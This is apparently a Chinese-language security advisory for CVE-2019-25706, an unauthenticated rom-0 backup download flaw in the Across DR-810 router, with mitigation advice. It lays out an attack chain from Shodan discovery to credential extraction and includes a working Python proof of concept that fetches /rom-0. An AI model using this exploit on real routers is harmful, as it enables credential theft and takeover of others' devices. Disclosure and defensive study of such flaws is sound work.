CVE-2019-25706 CVSS 7.5 高危

CVE-2019-25706: Across DR-810 未认证文件泄露漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25706

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Across DR-810

漏洞概述

Across DR-810 路由器存在严重的未认证文件泄露漏洞。由于设备对特定敏感端点缺乏访问控制，远程攻击者可在无需身份验证的情况下，通过发送简单的 GET 请求直接下载路由器的 rom-0 备份文件。该文件包含敏感的配置信息，攻击者解压后可获取路由器管理员密码等关键数据，进而完全控制设备。

技术细节

该漏洞的根本原因在于 Across DR-810 路由器的 Web 接口未对系统关键备份文件设置必要的访问权限控制。设备固件在 Web 服务器配置中存在疏忽，将包含完整系统配置的 rom-0 文件映射到了公开可访问的 URL 路径上（通常为 /rom-0）。由于漏洞利用无需用户交互且攻击复杂度低，远程攻击者仅需向目标设备发送恶意的 HTTP GET 请求即可触发漏洞。服务器接收到请求后，不会验证客户端的会话状态或认证令牌，直接将 rom-0 文件作为响应体回传。该文件虽然是二进制格式，但使用了特定的压缩算法（如 LZMA），攻击者利用现成的解压脚本即可解析出其中的配置脚本和密码哈希。这直接导致了设备管理权限的丧失，使得攻击者能够篡改路由器设置或监听网络流量。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或使用搜索引擎（如Shodan）寻找暴露在互联网上的Across DR-810路由器设备。

STEP 2

2. 漏洞探测

攻击者向目标设备的IP地址发送针对/rom-0路径的HTTP GET请求，检查是否返回文件内容。

STEP 3

3. 数据窃取

若设备存在漏洞，服务器响应200 OK并回传rom-0二进制备份文件，攻击者将其保存到本地。

STEP 4

4. 解密与解析

攻击者使用针对rom-0格式的解压或解密工具（如Python脚本）提取文件中的配置信息，获取管理员密码和PPPoe凭据。

STEP 5

5. 提权与控制

利用获取到的管理员凭据登录路由器Web管理界面，完全控制设备并进行恶意配置修改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Construct the vulnerable URL
    target_url = f"http://{target_ip}/rom-0"
    
    try:
        print(f"[*] Attempting to download rom-0 from {target_url}")
        # Send unauthenticated GET request
        response = requests.get(target_url, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit successful! File received.")
            # Save the binary content
            filename = "rom-0.bin"
            with open(filename, "wb") as f:
                f.write(response.content)
            print(f"[+] Backup file saved as {filename}.")
            print("[*] Use decompression tools (e.g., rom-0 decryptor) to extract credentials.")
        else:
            print(f"[-] Failed. HTTP Status Code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the target router IP address
    target = "192.168.1.1"
    exploit(target)

影响范围

Across DR-810

防御指南

临时缓解措施

如果无法立即升级固件，建议通过防火墙规则阻断外部网络对路由器Web管理端口（通常为80/443）的访问，仅允许内网管理。同时，应更改默认管理员密码并检查日志文件，确认是否已被攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表